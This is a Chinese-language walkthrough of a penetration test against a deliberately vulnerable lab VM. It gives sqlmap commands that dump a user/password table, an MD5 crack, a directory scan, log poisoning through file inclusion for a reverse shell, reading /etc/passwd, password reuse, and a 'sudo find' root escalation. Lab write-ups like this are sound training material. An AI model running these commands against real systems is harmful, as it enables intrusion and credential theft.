【网络安全:XiaoL_001靶场通关教程】

7 阅读 2026-07-18

【网络安全:XiaoL_001靶场通关教程】

信息:

发布者:是小新呀

发布日期:26-5-2

靶场系统:Centos 7 2009

中间件:Apache

数据库:mysql

编程语言:PHP7.2

使用教程:

鼠标右键打击打开,知道XiaoL001文件夹选择XiaoL-001.ovf文件后打开

虚拟机名称:xiaoL_001

虚拟机路径:任意

开始渗透测试:GO!

目标:192.168.10.134

开放了3个端口22,80,111,3306

接下来进行详细的扫描

22端口是ssh,80端口是apache,111是RPC,3306是mysql数据库

打开80端口访问一下

发现301跳转到了,但是没有正常打开,此时此刻需要添加host记录到/etc/hosts文件里面 执行sudo vim /etc/hosts

按i进入编辑模式,输入完成后输入键盘:wq!回车即可

接下来访问网站就可以正常打开了

我们随便点击按钮按一下即可

可以看到URL有一个id参数,或许存在注入点

可以sqlmap一下,执行

sqlmap -u "http://www.whitehouse.load/?page=post&id=2" --level 5 -batch -dbs

可以看到有一个名为baigo的数据库

用sqlmap进行下一步枚举数据表,可以执行执行这个命令:

sqlmap -u "http://www.whitehouse.load/?page=post&id=2" --level 5 -batch -D baigo –tables

可以发现有2个数据表,一个是xiao_user和xiao_news,我们实现对xiao_user枚举字段,执行命令:

sqlmap -u "http://www.whitehouse.load/?page=post&id=2" --level 5 -batch -D baigo -T xiao_user --columns

可以看到有3个字段,id,user,pass接下来我们对于user,pass字段的数据进行枚举,可以输入以下命令:

sqlmap -u "http://www.whitehouse.load/?page=post&id=2" --level 5 -D baigo -T xiao_user -C user,pass -dump

按2个no后就可以看到用户名是xiaoxin,密码是一个哈希,接下来可以用在线的网站(www.somd5.com)进行md5的解密

可以看到密码是:xiaol001

有了账号密码了,说不定网站有后门,可以使用dirsearch扫描一下哈,执行:

dirsearch -u "http://www.whitehouse.load/" -x 404,403,401

有个http://www.whitehouse.load/admin/,访问一下

输入刚才解密的密码xiaoxin和xiaol001

是一个内容管理后台,可以看得出来是发布的文章

这里可以添加文章,不过让我感兴趣的是有一个logs按钮,是一个日志

可以看出来打开日志页面后URL有一个GET方法传入file,可能是一个文件包含,那接下来如何想办法写入反向呢?发布文件或许可以触发

输入后点击发布,可以看到有一个文章

接下来看一眼日志,发现是标题保存到日志里面了,后面应该是时间戳

接下来输入反向?在kali监听4444

点击发布,访问日志页面,发现shell过来了

在shell执行:python -c 'import pty;pty.spawn("/bin/bash")'

先看一下网站目录吧!

ls -la /var/www/html

有一个配置文件,看一下

可以看到有数据库连接信息,有没有可能存在密码复用?看一下/etc/passwd

执行:cat /etc/passwd |grep "/bin/bash" 发现有root和xiao这个账户

试一下root用户?

不是…试一下xiao这个账户?

切换成功xiaoxin的账户,看一眼sudo

执行sudo -l

有一个fand可以特权,试一下吧

执行:sudo find / -type f -exec /bin/bash ;

特权成功!

接下来随便玩!